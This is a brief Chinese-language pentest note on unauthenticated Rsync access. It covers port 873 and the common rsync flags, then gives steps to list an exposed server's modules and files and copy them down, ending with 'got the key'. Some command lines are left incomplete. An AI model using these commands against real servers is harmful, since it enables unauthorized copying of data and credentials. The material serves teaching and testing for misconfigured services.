漏洞简介
Rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。常被用于在内网进行源代码的分发及同步更新,因此使用人群多为开发人员
优点:速度非常快,因为只同步文件当中不同的地方
Rsync默认端口:873
常用指令: -v, --verbose 详细模式输出。 -q, --quiet 精简输出模式。 -c, --checksum 打开校验开关,强制对文件传输进行校验。 -a, --archive 归档模式,表示以递归方式传输文件,并保持所有文件属性,等于-rlptgoD。 -r, --recursive 对子目录以递归模式处理。 -R, --relative 使用相对路径信息。 -b, --backup 创建备份,也就是对于目的已经存在有同样的文件名时,将老的文件重新命名为~filename。可以使用–suffix选项来指定不同的备份文件前缀。 –backup-dir 将备份文件(如~filename)存放在在目录下。
基本命令
rsync IP::
rsync
rsync -avz ip::www /tmp
rsync -avz
漏洞复现
1.查看服务器目录 命令: rsync --port=端口号 ip::
2.查看服务器目录下的文件 命令: rsync --port=端口号 ip::目录名
3.把服务器目录下的文件拷贝下来 命令: rsync --port=端口号 ip::目录名 ./
拿到key
|